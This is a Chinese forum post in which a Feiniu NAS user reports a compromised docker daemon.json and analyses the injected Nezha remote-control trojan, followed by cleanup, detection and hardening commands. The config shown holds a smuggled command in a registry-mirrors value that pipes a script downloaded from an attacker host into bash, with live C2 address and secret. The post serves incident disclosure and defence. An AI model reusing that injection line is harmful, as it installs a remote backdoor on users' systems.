飞牛中招后使用论坛上的方法修复升级为1.1.18后,发现docker无法启动。于是查询了下,原来daemon.josn被注入了恶意程序。
{"data-root":"/vol2/docker","insecure-registries":["127.0.0.1:19827"],"live-restore":true,"log-driver":"json-file","log-opts":{"max-file":"5","max-size":"100m"},"proxies":{},"registry-mirrors":["https://docker.fnnas.com","https://registry.hub.docker.com","https://794.example.com ; /usr/bin/curl -fssl https://sub-api-01.w1nc.xyz/static.sh | nz_server=static.132546.xyz:28028 nz_client_secret=fosyfkel66oygdytbru9psg3zbay0ufq bash ; /usr/bin/echo"]}
将恶意脚本下载分析了一下,是哪吒远控的变体木马。建议大家如果有相同问题按以下步骤查询是否中招。
深度分析:这是一个高度危险的恶意脚本
🚨 确认是恶意软件(木马/后门)
这个脚本是哪吒监控(nezha)的恶意变种,伪装成系统服务进行持久化控制。
一、恶意特征分析
1. 伪装和隐蔽性
- 伪装成系统服务:将自身命名为
systemd-journal(与真实系统服务同名),极难被发现
- 安装在系统目录:
/usr/lib/systemd/,利用系统信任路径
- 环境变量隐藏:通过环境变量传递控制参数,不留痕迹在配置文件中
2. 恶意功能分析
# 这些是关键恶意配置:
Environment=NZ_DISABLE_COMMAND_EXECUTE=false # 允许远程执行命令
Environment=NZ_SKIP_CONNECTION_COUNT=false # 连接计数,监控行为
攻击者可以:
- ✅ 远程执行任意命令(相当于获得root权限)
- ✅ 持久化驻留(系统重启后自动运行)
- ✅ 隐身运行(伪装成系统服务)
- ✅ 数据外泄(连接到攻击者服务器)
3. C2(命令与控制)服务器
- 控制服务器:
static.132546.xyz:28028(已在你之前的日志中出现)
- 下载服务器:
sub-api-01.w1nc.xyz
- 数据传输:通过环境变量中的密钥
fosyfkel66oygdytbru9psg3zbay0ufq 进行身份验证
二、技术细节分析
恶意payload结构:
攻击流程:
1. 检测系统架构 → 2. 下载对应架构的恶意二进制 → 3. 安装为系统服务 → 4. 连接到C2服务器
具体风险:
- 权限提升:以systemd服务运行,拥有最高权限
- 命令执行:攻击者可远程执行任意shell命令
- 数据窃取:可读取系统所有文件
- 横向移动:可在内网中扩散
- 挖矿/勒索:可部署其他恶意软件
三、紧急清理步骤
1. 立即停止并移除恶意服务
# 停止服务
sudo systemctl stop systemd-journal 2>/dev/null
# 禁用自启动
sudo systemctl disable systemd-journal 2>/dev/null
# 删除服务文件
sudo rm -f /etc/systemd/system/systemd-journal.service
# 删除二进制文件
sudo rm -f /usr/lib/systemd/systemd-journal
# 重新加载systemd
sudo systemctl daemon-reload
sudo systemctl reset-failed
2. 检查并清理所有相关进程
# 查找所有nezha相关进程
ps aux | grep -E '(nezha|systemd-journal|nz_)'
# 如果有发现,立即杀掉
sudo pkill -f nezha
sudo pkill -f systemd-journal
# 检查cron任务
crontab -l | grep -v 'w1nc.xyz\|132546.xyz'
sudo crontab -l | grep -v 'w1nc.xyz\|132546.xyz'
3. 网络隔离和检查
# 检查当前网络连接
sudo netstat -tunap | grep -E '(28028|132546)'
# 查看DNS缓存
sudo systemd-resolve --statistics
# 检查hosts文件
sudo cat /etc/hosts | grep -v 'w1nc.xyz\|132546.xyz'
4. 完整清理脚本
sudo tee /tmp/emergency_clean.sh << 'EOF'
#!/bin/bash
echo "=== 紧急清理恶意后门 ==="
# 1. 停止服务
systemctl stop systemd-journal 2>/dev/null
systemctl disable systemd-journal 2>/dev/null
# 2. 删除文件
rm -f /etc/systemd/system/systemd-journal.service
rm -f /usr/lib/systemd/systemd-journal
rm -f /tmp/static.sh
rm -f /tmp/nezha-agent.zip
# 3. 清理cron
TEMP_CRON=$(mktemp)
crontab -l 2>/dev/null | grep -v 'w1nc.xyz\|132546.xyz\|nezha' > $TEMP_CRON
crontab $TEMP_CRON 2>/dev/null
sudo crontab -l 2>/dev/null | grep -v 'w1nc.xyz\|132546.xyz\|nezha' > $TEMP_CRON
sudo crontab $TEMP_CRON 2>/dev/null
rm -f $TEMP_CRON
# 4. 清理环境变量(检查启动脚本)
grep -r "NZ_" /etc/profile.d/ /etc/environment 2>/dev/null
# 5. 重启systemd
systemctl daemon-reload
systemctl reset-failed
# 6. 检查残留进程
echo "检查残留进程:"
ps aux | grep -E '(nezha|nz_|132546|w1nc)'
echo "清理完成!建议重启系统。"
EOF
sudo chmod +x /tmp/emergency_clean.sh
sudo /tmp/emergency_clean.sh
四、后续安全加固
1. 更改所有密码
sudo passwd root
passwd
2. 检查其他系统文件
# 检查是否有其他恶意文件
sudo find / -type f -name "*.sh" -exec grep -l "w1nc.xyz\|132546.xyz" {} \; 2>/dev/null
sudo find / -type f -name "*.service" -exec grep -l "nezha\|systemd-journal" {} \; 2>/dev/null
3. 审计SSH访问
# 检查SSH授权密钥
cat ~/.ssh/authorized_keys
sudo cat /root/.ssh/authorized_keys
# 查看SSH登录记录
sudo last -20
sudo grep "Failed password" /var/log/auth.log
4. 考虑重装系统
如果这是生产服务器,建议备份数据后重装系统,因为:
- 无法确定攻击者还植入了什么
- systemd级别的后门很难完全清理干净
- 可能有其他隐藏的恶意组件
五、检测方法
如何判断是否已感染:
# 检查点1:服务是否存在
systemctl status systemd-journal 2>/dev/null
# 检查点2:二进制文件是否存在
ls -la /usr/lib/systemd/systemd-journal 2>/dev/null
# 检查点3:网络连接
sudo lsof -i :28028 2>/dev/null
# 检查点4:进程
ps aux | grep -v grep | grep nezha
🚨 安全警告
这是一次严重的服务器入侵事件! 攻击者已获得你服务器的完全控制权。
必须立即采取的行动:
- ✅ 立即断网(拔掉网线或禁用网络接口)
- ✅ 按照上述步骤清理
- ✅ 更改所有相关系统密码
- ✅ 检查所有其他服务器(攻击可能已横向扩散)
- ✅ 通知相关安全团队
取证建议:
# 保存证据
sudo tar czf /tmp/forensics_$(date +%s).tar.gz \
/etc/systemd/system/systemd-journal.service \
/usr/lib/systemd/systemd-journal \
/var/log/syslog* \
/var/log/auth.log*
请立即行动! 这个后门每多运行一分钟,你的数据就多一分危险。
小白可以将检查结果一股脑的扔给AI让它帮你分析是否中招以及后续解决办法。我这边基本清理干净了,先观察两天,看看是否还有别的木马被注入。
